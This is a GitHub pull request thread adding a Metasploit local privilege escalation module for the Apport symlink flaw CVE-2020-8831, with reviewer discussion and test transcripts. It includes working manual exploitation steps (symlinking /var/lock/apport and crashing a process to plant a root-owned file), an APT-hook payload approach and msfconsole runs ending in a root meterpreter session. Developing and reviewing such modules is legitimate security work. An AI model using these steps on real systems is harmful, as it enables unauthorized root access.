Skip to content

Add Apport Symlink Hijacking: CVE-2020-8831#20037

Open
gardnerapp wants to merge 50 commits into
rapid7:masterfrom
gardnerapp:cve-2020-8831
Open

Add Apport Symlink Hijacking: CVE-2020-8831#20037
gardnerapp wants to merge 50 commits into
rapid7:masterfrom
gardnerapp:cve-2020-8831

Conversation

@gardnerapp

Copy link
Copy Markdown
Contributor

This pull request is a draft for CVE-2020-8831, I originally came across this vulnerability while reading From Day Zero to Zero Day, which I highly recommend. The long story short is that certain versions of apport will follow symbolic links when writing crash dumps. This file will have a mask of 777 and be owned by root. In this module I used the command ln -s /cron.d /var/lock/apport so that a /etc/cron.d/lock crontab file would be created. This crontab should execute a payload every minute which was located in the /tmp directory.

After scratching my head for several hours and combing through the log files I found that the crontab would not execute because it's file permissions were too excessive. We need to find another place for the symlink hijacking to occur. I have a few places in mind namely /etc/init.d/ or ~/.bashrc which would trigger the payload upon startup. I am submitting this because I am unsure of which route to go or if there are other places where the symlink hijacking should occur. Thank you !

@gardnerapp gardnerapp marked this pull request as draft April 13, 2025 18:54
@gardnerapp

Copy link
Copy Markdown
Contributor Author

I've accidentally committed pushes from another module. My apologizes, I am unsure of the proper way to remove these.

@bcoles bcoles added the module label Apr 14, 2025
@bwatters-r7 bwatters-r7 self-assigned this Apr 15, 2025
@bwatters-r7

Copy link
Copy Markdown
Contributor

I've accidentally committed pushes from another module. My apologizes, I am unsure of the proper way to remove these.

No problem; git is really awesome, but not always super intuitive.

It looks like the unwanted commits are all related to your previous game overlay module.
I can think of 3 ways to fix it (in order of what I would try first)

  1. Rebase and only bring in the changes for the new module
  2. Open a new branch current with master, check the file you want out to it, commit the changes, then force-push the new branch with just the new module to your existing branch
  3. Open a new branch that's current with master, then get merge --cherry-pick the changes you want.

Last, if you want, let me know and I am pretty sure I can fix it for you, but you might lose some commits. The only file you need here is modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb, right?

@gardnerapp

Copy link
Copy Markdown
Contributor Author

Yes, I only want the files relevant to this module pushed. I just added the rebase let me know if it is sufficient.

@bwatters-r7

Copy link
Copy Markdown
Contributor

Yes, I only want the files relevant to this module pushed. I just added the rebase let me know if it is sufficient.

Looks good! Let us know when you'd like us to review it.

Comment thread modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb Outdated
Comment thread modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb Outdated
Comment thread modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb Outdated
Comment thread modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb Outdated
)
)
register_options [
OptString.new('WRITABLE_DIR', [true, 'A directory we can write to.', '/tmp']),

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

For local exploit modules, this is usually registered as an advanced option:

    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]

Comment thread modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb Outdated
Comment thread modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb Outdated
…esc.rb

Co-authored-by: Brendan <bwatters@rapid7.com>
@gardnerapp

Copy link
Copy Markdown
Contributor Author

Have you seen the comments above the check method? See if running dpkg again helps, I have to do that each time I boot before testing:

 # If you are testing the module apport needs to be reinstalled on boot every time with
    # sudo dpkg -i apport_2.20.11-0ubuntu21_all.deb

    # sudo rm -rf /var/lock/apport/ /tmp/payload /etc/apt/apt.conf.d/lock && unlink /var/lock/apport
    # The above must be run after each subsequent test!

@gardnerapp

Copy link
Copy Markdown
Contributor Author

I have good news, I tested the exploit again and everything worked great. Testing is a pain because we aren't working with a clean slate, we need to reset the system every time.

Here are the commands I used to do this:

ubuntu@ubuntu:~$  sudo dpkg -i apport_2.20.11-0ubuntu21_all.deb(Reading database ... 161836 files and directories currently installed.)Preparing to unpack apport_2.20.11-0ubuntu21_all.deb ...Unpacking apport (2.20.11-0ubuntu21) over (2.20.11-0ubuntu21) ...Setting up apport (2.20.11-0ubuntu21) ...apport-autoreport.service is a disabled or a static unit, not starting it.Processing triggers for systemd (245.4-4ubuntu3.21) ...Processing triggers for hicolor-icon-theme (0.17-2) ...Processing triggers for man-db (2.9.1-1) ...
ubuntu@ubuntu7:~$ sudo rm -rf /var/lock/apport/ 
ubuntu@ubuntu:~$ sudo rm -rf /etc/apt/apt.conf.d/lock

Now we're going to set up our meterpreter. I'm only using a bind shell because the test system is in the cloud.

# Remote system. 
#  shell is linux/x64/meterpreter/bind_tcp, LPORT=5555
./bind.elf

C2:

msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set lport 5555
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 13.221.237.118:5555
[*] Sending stage (3045380 bytes) to 13.221.237.118
[*] Meterpreter session 4 opened (192.168.200.109:51826 -> 13.221.237.118:5555) at 2026-03-16 09:05:24 -0400

meterpreter > bg
[*] Backgrounding session 4...

# Now we run the exploit 
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2020_8831_apport_symlink_privesc 
[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp

msf6 exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > set session 4
session => 4
msf6 exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf6 exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Creating symlink...
[*] DEBUG BEFORE CRASH: ls -la /etc/apt/apt.conf.d/ total 64
drwxr-xr-x 2 root root 4096 Mar 16 13:09 .
drwxr-xr-x 7 root root 4096 Jul 15  2023 ..
-rw-r--r-- 1 root root   92 Apr  9  2020 01-vendor-ubuntu
-rw-r--r-- 1 root root  630 Apr  9  2020 01autoremove
-rw-r--r-- 1 root root  129 Apr  2  2020 10periodic
-rw-r--r-- 1 root root  108 Apr  2  2020 15update-stamp
-rw-r--r-- 1 root root  311 Apr  6  2023 20apt-esm-hook.conf
-rw-r--r-- 1 root root   85 Apr  2  2020 20archive
-rw-r--r-- 1 root root   80 Apr 13  2020 20auto-upgrades
-rw-r--r-- 1 root root 1040 Mar 12  2020 20packagekit
-rw-r--r-- 1 root root  127 Dec  1  2022 20snapd.conf
-rw-r--r-- 1 root root  625 Oct  7  2019 50command-not-found
-rw-r--r-- 1 root root 5459 Apr 13  2020 50unattended-upgrades
-rw-r--r-- 1 root root  182 Aug  3  2019 70debconf
-rw-r--r-- 1 root root  305 Apr  2  2020 99update-notifier
[*] Triggering crash...
[*] DEBUG AFTER CRASH: ls -la /etc/apt/apt.conf.d/ total 64
drwxr-xr-x 2 root root 4096 Mar 16 13:09 .
drwxr-xr-x 7 root root 4096 Jul 15  2023 ..
-rw-r--r-- 1 root root   92 Apr  9  2020 01-vendor-ubuntu
-rw-r--r-- 1 root root  630 Apr  9  2020 01autoremove
-rw-r--r-- 1 root root  129 Apr  2  2020 10periodic
-rw-r--r-- 1 root root  108 Apr  2  2020 15update-stamp
-rw-r--r-- 1 root root  311 Apr  6  2023 20apt-esm-hook.conf
-rw-r--r-- 1 root root   85 Apr  2  2020 20archive
-rw-r--r-- 1 root root   80 Apr 13  2020 20auto-upgrades
-rw-r--r-- 1 root root 1040 Mar 12  2020 20packagekit
-rw-r--r-- 1 root root  127 Dec  1  2022 20snapd.conf
-rw-r--r-- 1 root root  625 Oct  7  2019 50command-not-found
-rw-r--r-- 1 root root 5459 Apr 13  2020 50unattended-upgrades
-rw-r--r-- 1 root root  182 Aug  3  2019 70debconf
-rw-r--r-- 1 root root  305 Apr  2  2020 99update-notifier
-rwxrwxrwx 1 root root    0 Mar 16 13:09 lock
[+] Successfully created /etc/apt/apt.conf.d/lock
[*] Uploading payload..
[*] Writing '/home/ubuntu/qgcMGQvp' (198 bytes) ...
[+] The next time apt-get is used to update, upgrade or install your payload will be triggered. Cheers ;)
[*] Started bind TCP handler against :4444
[*] Exploit completed, but no session was created.

# we wait for a session before sudo apt-get update gets run

Check the files on the remote system

ubuntu@ubuntu:~$ sudo rm -rf /var/lock/apport/ 
ubuntu@ubuntu:~$ sudo rm -rf /etc/apt/apt.conf.d/lock
ubuntu@ubuntu:~$ ls -la /etc/apt/apt.conf.d/lock
-rwxrwxrwx 1 root root 155 Mar 16 13:09 /etc/apt/apt.conf.d/lock
ubuntu@ubuntu:~$ ls -la /var/lock/apportl
rwxrwxrwx 1 ubuntu ubuntu 20 Mar 16 13:09 /var/lock/apport -> /etc/apt/apt.conf.d/
ubuntu@ubuntu:~$ ls -la /home/ubuntu/qgcMGQvp
-rwx------ 1 ubuntu ubuntu 198 Mar 16 13:09 /home/ubuntu/qgcMGQvp

We trigger the payload by running sudo apt-get update on the remote system. As the hook is run this command stalls.

Let's trigger our listener and grab a shell:

msf6 exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > use exploit/multi/handler
[*] Using configured payload linux/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set lport 4444 
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 13.221.237.118:4444
[*] Sending stage (3045380 bytes) to 13.221.237.118
[*] Meterpreter session 6 opened (192.168.200.109:51854 -> 13.221.237.118:4444) at 2026-03-16 09:11:24 -0400

meterpreter > bg
[*] Backgrounding session 6...
sessions -l

Active sessions
===============

  Id  Name  Type                   Information                           Connection
  --  ----  ----                   -----------                           ----------
  4         meterpreter x64/linux  ubuntu @ ip-172-26-8-97.ec2.internal  192.168.200.109:51826 -> 13.221.237.118:5555 (172.26.8.97)
  6         meterpreter x64/linux  root @ ip-172-26-8-97.ec2.internal    192.168.200.109:51854 -> 13.221.237.118:4444 (172.26.8.97)


msf6 exploit(multi/handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: root

Let me know if this helps.

@bwatters-r7

Copy link
Copy Markdown
Contributor

I'm sorry; I am still struggling with this one.....
I can't get apport_2.20.11-0ubuntu21_all.deb The link you sent was to apport_2.20.11-0ubuntu82_all.deb and I cannot get that to work.
I can get apport_2.20.9-0ubuntu7_all.deb and that should work, right?
Here is my attempt
Get the host ready:

msfuser@ubuntu2204x64:~$ sudo apt-get remove apport
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  apport-symptoms gdb libbabeltrace1 libboost-regex1.74.0 libc6-dbg libdebuginfod-common libdebuginfod1 libipt2
  libsource-highlight-common libsource-highlight4v5 python3-systemd
Use 'sudo apt autoremove' to remove them.
The following packages will be REMOVED:
  apport
0 upgraded, 0 newly installed, 1 to remove and 1 not upgraded.
After this operation, 836 kB disk space will be freed.
Do you want to continue? [Y/n] Y
(Reading database ... 215263 files and directories currently installed.)
Removing apport (2.20.11-0ubuntu82.10) ...
Processing triggers for man-db (2.10.2-1) ...
Processing triggers for hicolor-icon-theme (0.17-2) ...
msfuser@ubuntu2204x64:~$ pwd
/home/msfuser
msfuser@ubuntu2204x64:~$ sudo dpkg -i Downloads/apport_2.20.9-0ubuntu7_all.deb
Selecting previously unselected package apport.
(Reading database ... 215184 files and directories currently installed.)
Preparing to unpack .../apport_2.20.9-0ubuntu7_all.deb ...
Unpacking apport (2.20.9-0ubuntu7) ...
Setting up apport (2.20.9-0ubuntu7) ...
Installing new version of config file /etc/init.d/apport ...
Processing triggers for hicolor-icon-theme (0.17-2) ...
Processing triggers for man-db (2.10.2-1) ...
msfuser@ubuntu2204x64:~$ sudo rm -rf /var/lock/apport/
msfuser@ubuntu2204x64:~$ sudo rm -rf /etc/apt/apt.conf.d/lock
msfuser@ubuntu2204x64:~$ sudo unlink /var/lock/apport
msfuser@ubuntu2204x64:~$ uname -a
Linux ubuntu2204x64 6.8.0-1044-azure #50~22.04.1-Ubuntu SMP Wed Dec  3 15:13:22 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
msfuser@ubuntu2204x64:~$

Resulting attempt:

msf exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > run
[*] Started reverse TCP handler on 10.5.135.201:7878 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Apport appears to be vulnerable.
[+] The target appears to be vulnerable.
[*] Creating symlink...
[*] DEBUG: ln -s /etc/apt/apt.conf.d/ /var/lock/apport
[*] DEBUG BEFORE CRASH: ls -la /etc/apt/apt.conf.d/ total 84
drwxr-xr-x 2 root root 4096 Feb 18 06:06 .
drwxr-xr-x 8 root root 4096 Aug 30  2025 ..
-rw-r--r-- 1 root root   49 Feb  9 17:26 00aptitude
-rw-r--r-- 1 root root  630 Apr  8  2022 01autoremove
-rw-r--r-- 1 root root   92 Apr  8  2022 01-vendor-ubuntu
-rw-r--r-- 1 root root  129 Feb 16  2024 10periodic
-rw-r--r-- 1 root root  108 Feb 16  2024 15update-stamp
-rw-r--r-- 1 root root  392 Jun 24  2025 20apt-esm-hook.conf
-rw-r--r-- 1 root root   85 Feb 16  2024 20archive
-rw-r--r-- 1 root root   80 Feb 19  2021 20auto-upgrades
-rw-r--r-- 1 root root  243 Dec 16  2009 20dbus
-rw-r--r-- 1 root root 1040 Feb 17  2022 20packagekit
-rw-r--r-- 1 root root  127 May 21  2025 20snapd.conf
-rw-r--r-- 1 root root 2593 Feb 22  2022 50appstream
-rw-r--r-- 1 root root  625 Dec  8  2021 50command-not-found
-rw-r--r-- 1 root root 6155 Jan 14  2022 50unattended-upgrades
-rw-r--r-- 1 root root  435 Feb 22  2022 60icons
-rw-r--r-- 1 root root  251 Feb 22  2022 60icons-hidpi
-rw-r--r-- 1 root root  182 Feb 20  2022 70debconf
-rw-r--r-- 1 root root  305 Feb 16  2024 99update-notifier
[*] Triggering crash...
[*] DEBUG AFTER CRASH: ls -la /etc/apt/apt.conf.d/ total 84
drwxr-xr-x 2 root root 4096 Feb 18 06:06 .
drwxr-xr-x 8 root root 4096 Aug 30  2025 ..
-rw-r--r-- 1 root root   49 Feb  9 17:26 00aptitude
-rw-r--r-- 1 root root  630 Apr  8  2022 01autoremove
-rw-r--r-- 1 root root   92 Apr  8  2022 01-vendor-ubuntu
-rw-r--r-- 1 root root  129 Feb 16  2024 10periodic
-rw-r--r-- 1 root root  108 Feb 16  2024 15update-stamp
-rw-r--r-- 1 root root  392 Jun 24  2025 20apt-esm-hook.conf
-rw-r--r-- 1 root root   85 Feb 16  2024 20archive
-rw-r--r-- 1 root root   80 Feb 19  2021 20auto-upgrades
-rw-r--r-- 1 root root  243 Dec 16  2009 20dbus
-rw-r--r-- 1 root root 1040 Feb 17  2022 20packagekit
-rw-r--r-- 1 root root  127 May 21  2025 20snapd.conf
-rw-r--r-- 1 root root 2593 Feb 22  2022 50appstream
-rw-r--r-- 1 root root  625 Dec  8  2021 50command-not-found
-rw-r--r-- 1 root root 6155 Jan 14  2022 50unattended-upgrades
-rw-r--r-- 1 root root  435 Feb 22  2022 60icons
-rw-r--r-- 1 root root  251 Feb 22  2022 60icons-hidpi
-rw-r--r-- 1 root root  182 Feb 20  2022 70debconf
-rw-r--r-- 1 root root  305 Feb 16  2024 99update-notifier
[-] Exploit aborted due to failure: not-found: exploit was unable to create /etc/apt/apt.conf.d/lock
[*] Exploit completed, but no session was created.
msf exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > 

@gardnerapp

Copy link
Copy Markdown
Contributor Author

Try this for for apport_2.20.11-0ubuntu82_all.deb . Per my research earlier versions of Apport should be vulnerable, I have not personally tested the exploit against these.

Copilot AI left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

Adds a new Metasploit local privilege escalation module for Apport symlink hijacking (CVE-2020-8831), plus accompanying user documentation describing usage and setup.

Changes:

  • Introduces an exploit module that attempts to gain root by leveraging Apport’s lockfile write via a symlink into /etc/apt/apt.conf.d/ and installing APT pre-invoke hooks.
  • Adds module documentation covering background, options, and an example scenario transcript.

Reviewed changes

Copilot reviewed 2 out of 2 changed files in this pull request and generated 15 comments.

File Description
modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb New LPE module implementing Apport symlink hijack to drop an APT hook that executes a payload.
documentation/modules/exploit/linux/local/cve_2020_8831_apport_symlink_privesc.md New documentation describing vulnerability details, module usage, options, and an example run.

Comment thread modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb Outdated
Comment thread documentation/modules/exploit/linux/local/cve_2020_8831_apport_symlink_privesc.md Outdated
Comment thread documentation/modules/exploit/linux/local/cve_2020_8831_apport_symlink_privesc.md Outdated
Comment thread modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb Outdated
Comment thread modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb Outdated
Comment thread documentation/modules/exploit/linux/local/cve_2020_8831_apport_symlink_privesc.md Outdated
Comment thread modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb Outdated
Comment thread documentation/modules/exploit/linux/local/cve_2020_8831_apport_symlink_privesc.md Outdated
gardnerapp and others added 8 commits April 20, 2026 07:45
…esc.rb

Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
…_symlink_privesc.md

Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
…esc.rb

Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
…_symlink_privesc.md

Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
…esc.rb

Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
…_symlink_privesc.md

Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
@gardnerapp

Copy link
Copy Markdown
Contributor Author

I've made it so that the module now writes cmd payloads directly to the hook file. Additionally, setsid is called to fork a child process allowing the payload to run without stalling operations by apt. This was also done in the apt persistence module.

@bwatters-r7 bwatters-r7 removed their assignment May 20, 2026
@bwatters-r7 bwatters-r7 moved this from In Progress to Ready in Metasploit Kanban Jun 1, 2026
@jheysel-r7 jheysel-r7 self-assigned this Jun 3, 2026

@jheysel-r7 jheysel-r7 left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hey @gardnerapp thanks for the module! A couple comments:

Different patched versions for different Ubuntu releases

I noticed in a couple places, such as the documentation Description, Vulnerable Application and the module metadata Description, all mention that versions <= 2.20.11 are vulnerable which isn't accurate. Could you update those sections to reflect each release and they're corresponding patched versions?
Image

Also the check method will need to be updated to reflect these different version ranges.

I cannot get this module to work

I was first testing on Ubuntu 22 but after I checked the CVE page I noticed it wasn't listed as having a patched version so I figured it wasn't affected. I setup an Ubuntu 18 version and installed the vulnerable: apport_2.20.8-0ubuntu6_all.deb package. After much debugging I cannot get the exploit to create the /etc/apt/apt.conf.d/lock file (same failure as my colleague).

Could you please send me the version of ubuntu you've tested on, information on the user and the groups they're apart of that you're using for the session to run this module and the version of apport installed? Sending over the output of these three commands should suffice:

msfuser@ubuntu:~$ uname -a
Linux ubuntu 5.4.0-150-generic #167~18.04.1-Ubuntu SMP Wed May 24 00:51:42 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
msfuser@ubuntu:~$ id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
msfuser@ubuntu:~$ dpkg -l apport
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                   Version          Architecture     Description
+++-======================-================-================-==================================================
ii  apport                 2.20.8-0ubuntu6  all              automatically generate crash reports for debugging

Comment thread modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb Outdated
Comment thread modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb Outdated
@jheysel-r7 jheysel-r7 moved this from Ready to Waiting on Contributor in Metasploit Kanban Jun 4, 2026
gardnerapp and others added 2 commits June 22, 2026 13:02
…esc.rb

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
…esc.rb

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
@gardnerapp

Copy link
Copy Markdown
Contributor Author

I apologize for getting the vulnerable versions mixed up. I am updating the check method to incorporate the vulnerable versions on each Ubuntu release. Different versions of Apport are available for download here. I am running Focal Fossa:

ubuntu@ubuntu~$ uname -a
Linux 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

ubuntu@ubuntu:~$ cat /etc/os-release
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"

Via the Ubuntu Security page for CVE-2020-8831 patches of the vulnerability for Focal Fossa are available starting at versions > 2.20.11-0ubuntu22. Therefore the most recent release of Apport before the patch will be version 2.20.11-0ubuntu21. We can find the vulnerable build for this version here, which we can download to our system via: $ curl http://launchpadlibrarian.net/469902232/apport_2.20.11-0ubuntu21_all.deb --output apport_2.20.11-0ubuntu21_all.deb

Now that the package downloaded we need to install it with sudo dpkg -i apport_2.20.11-0ubuntu21_all.deb. Once the proper installation of the package is installed we can check it's version with sudo dpkg -l apport. Here is the output of the command:

~$ sudo dpkg -l apport
Desired=Unknown/Install/Remove/Purge/Hold| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)||/ Name           Version           Architecture Description+++-==============-=================-============-==================================================ii  apport         2.20.11-0ubuntu21 all          automatically generate crash reports for debugging

This exploit is relatively simple, as there are a lot of moving parts in the Metasploit module we can manually test exploitation to verify that the system is vulnerable. Below we see that /etc is not writable by normal users but by causing a crash we can write a file named lock to it after symbolically linking /var/lock/apport to /etc:

ubuntu@ubuntu:~$ whoami
ubuntu
ubuntu@ubuntu:~$ ls -la /etc/
total 896 drwxr-xr-x 107 root root       4096 Jul 29  2025 .
ubuntu@ubuntu:~$ ln -s /etc /var/lock/apport
ubuntu@ubuntu:~$ ls -la /var/lock/apport
lrwxrwxrwx 1 ubuntu ubuntu 4 Jun 22 17:50 /var/lock/apport -> /etc
ubuntu@ubuntu:~$ sleep 10s & kill -11 $![1] 2330
ubuntu@ubuntu:~$ ls -la /etc/lock
-rwxrwxrwx 1 root root 0 Feb 12  2025 /etc/lock[1]+  Segmentation fault      (core dumped) sleep 10s

After verifying manual exploitation we can test the module, which escalates privileges by symbolically linking /var/lock/apport to /etc/apt/apt.conf.d. Can you confirm that manual exploitation works on your test system? If not then something is wrong with the module. If you move onto testing the module I recommend removing the lock file at /etc/apt/apt.conf.d/lock and the payload file under /tmp/ with each subsequent run. In the meantime I am going to work on updating the check method. Thank you for the help I know that this PR has been open for a while.

@jheysel-r7 jheysel-r7 left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hey @gardnerapp - thanks for the detailed outline. I've verified that the new Ubuntu 20.04 target I just set up is vulnerable, I am able to cause the lock file to be written to the /etc/ folder as root.

msfuser@ubuntu:~$ id -a
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),133(lxd),134(sambashare)
msfuser@ubuntu:~$ cd /etc
msfuser@ubuntu:/etc$ touch test
touch: cannot touch 'test': Permission denied
msfuser@ubuntu:/etc$ ln -s /etc /var/lock/apport
msfuser@ubuntu:/etc$ ls -la /var/lock/apport
lrwxrwxrwx 1 msfuser msfuser 4 Jun 23 16:27 /var/lock/apport -> /etc
msfuser@ubuntu:/etc$ sleep 10s & kill -11 $!
[1] 9286
msfuser@ubuntu:/etc$ ls -la /etc/lock
-rwxr-xr-x 1 root root 0 Jun 23 16:31 /etc/lock
[1]+  Segmentation fault      (core dumped) sleep 10s
msfuser@ubuntu:/etc$

However this module is still not working for me:

msf6 exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > set REMOVE_LOCK_DIR true
REMOVE_LOCK_DIR => true
msf6 exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > run

[*] Started reverse TCP handler on 172.16.199.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Apport appears to be vulnerable.
[+] The target appears to be vulnerable.
[*] Creating symlink...
[*] DEBUG: ln -s /etc/apt/apt.conf.d/ /var/lock/apport
[*] DEBUG BEFORE CRASH: ls -la /etc/apt/apt.conf.d/ total 88
drwxr-xr-x 2 root root 4096 Jun 23 10:27 .
drwxr-xr-x 7 root root 4096 Jun 23 10:27 ..
-rw-rw-r-- 1 root root   49 Jun 23 10:21 00aptitude
-rw-rw-r-- 1 root root   40 Jun 23 10:20 00trustcdrom
-rw-r--r-- 1 root root   92 Apr  9  2020 01-vendor-ubuntu
-rw-r--r-- 1 root root  630 Apr  9  2020 01autoremove
-rw-r--r-- 1 root root  129 Jan 20  2023 10periodic
-rw-r--r-- 1 root root  108 Jan 20  2023 15update-stamp
-rw-r--r-- 1 root root  450 Feb 28  2023 20apt-esm-hook.conf
-rw-r--r-- 1 root root   85 Jan 20  2023 20archive
-rw-r--r-- 1 root root   80 Apr 25  2022 20auto-upgrades
-rw-r--r-- 1 root root  243 Dec 16  2009 20dbus
-rw-r--r-- 1 root root 1040 Sep 23  2020 20packagekit
-rw-r--r-- 1 root root  127 Dec  1  2022 20snapd.conf
-rw-r--r-- 1 root root 2592 Jan 18  2020 50appstream
-rw-r--r-- 1 root root  625 Feb 10  2022 50command-not-found
-rw-r--r-- 1 root root 5459 May 19  2022 50unattended-upgrades
-rw-r--r-- 1 root root  435 Jan 18  2020 60icons
-rw-r--r-- 1 root root  251 Jan 18  2020 60icons-hidpi
-rw-r--r-- 1 root root  182 Aug  3  2019 70debconf
-rw-r--r-- 1 root root  305 Jan 20  2023 99update-notifier
[*] Triggering crash...
[*] DEBUG AFTER CRASH: ls -la /etc/apt/apt.conf.d/ total 88
drwxr-xr-x 2 root root 4096 Jun 23 10:27 .
drwxr-xr-x 7 root root 4096 Jun 23 10:27 ..
-rw-rw-r-- 1 root root   49 Jun 23 10:21 00aptitude
-rw-rw-r-- 1 root root   40 Jun 23 10:20 00trustcdrom
-rw-r--r-- 1 root root   92 Apr  9  2020 01-vendor-ubuntu
-rw-r--r-- 1 root root  630 Apr  9  2020 01autoremove
-rw-r--r-- 1 root root  129 Jan 20  2023 10periodic
-rw-r--r-- 1 root root  108 Jan 20  2023 15update-stamp
-rw-r--r-- 1 root root  450 Feb 28  2023 20apt-esm-hook.conf
-rw-r--r-- 1 root root   85 Jan 20  2023 20archive
-rw-r--r-- 1 root root   80 Apr 25  2022 20auto-upgrades
-rw-r--r-- 1 root root  243 Dec 16  2009 20dbus
-rw-r--r-- 1 root root 1040 Sep 23  2020 20packagekit
-rw-r--r-- 1 root root  127 Dec  1  2022 20snapd.conf
-rw-r--r-- 1 root root 2592 Jan 18  2020 50appstream
-rw-r--r-- 1 root root  625 Feb 10  2022 50command-not-found
-rw-r--r-- 1 root root 5459 May 19  2022 50unattended-upgrades
-rw-r--r-- 1 root root  435 Jan 18  2020 60icons
-rw-r--r-- 1 root root  251 Jan 18  2020 60icons-hidpi
-rw-r--r-- 1 root root  182 Aug  3  2019 70debconf
-rw-r--r-- 1 root root  305 Jan 20  2023 99update-notifier
[-] Exploit aborted due to failure: not-found: exploit was unable to create /etc/apt/apt.conf.d/lock
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/cve_2020_8831_apport_symlink_privesc) >

Comment thread modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb Outdated
@gardnerapp

Copy link
Copy Markdown
Contributor Author

I've gotten the exploit to work:

msf6 exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Apport appears to be vulnerable
[+] The target appears to be vulnerable.
[*] Creating symlink...
[*] DEBUG: ln -s /etc/apt/apt.conf.d/ /var/lock/apport
[*] DEBUG BEFORE CRASH: ls -la /etc/apt/apt.conf.d/ total 64
drwxr-xr-x 2 root root 4096 Jul  6 13:29 .
drwxr-xr-x 7 root root 4096 Jul 15  2023 ..
-rw-r--r-- 1 root root   92 Apr  9  2020 01-vendor-ubuntu
-rw-r--r-- 1 root root  630 Apr  9  2020 01autoremove
-rw-r--r-- 1 root root  129 Apr  2  2020 10periodic
-rw-r--r-- 1 root root  108 Apr  2  2020 15update-stamp
-rw-r--r-- 1 root root  311 Apr  6  2023 20apt-esm-hook.conf
-rw-r--r-- 1 root root   85 Apr  2  2020 20archive
-rw-r--r-- 1 root root   80 Apr 13  2020 20auto-upgrades
-rw-r--r-- 1 root root 1040 Mar 12  2020 20packagekit
-rw-r--r-- 1 root root  127 Dec  1  2022 20snapd.conf
-rw-r--r-- 1 root root  625 Oct  7  2019 50command-not-found
-rw-r--r-- 1 root root 5459 Apr 13  2020 50unattended-upgrades
-rw-r--r-- 1 root root  182 Aug  3  2019 70debconf
-rw-r--r-- 1 root root  305 Apr  2  2020 99update-notifier
[*] Triggering crash...
[*] DEBUG AFTER CRASH: ls -la /etc/apt/apt.conf.d/ total 64
drwxr-xr-x 2 root root 4096 Jul  6 13:32 .
drwxr-xr-x 7 root root 4096 Jul 15  2023 ..
-rw-r--r-- 1 root root   92 Apr  9  2020 01-vendor-ubuntu
-rw-r--r-- 1 root root  630 Apr  9  2020 01autoremove
-rw-r--r-- 1 root root  129 Apr  2  2020 10periodic
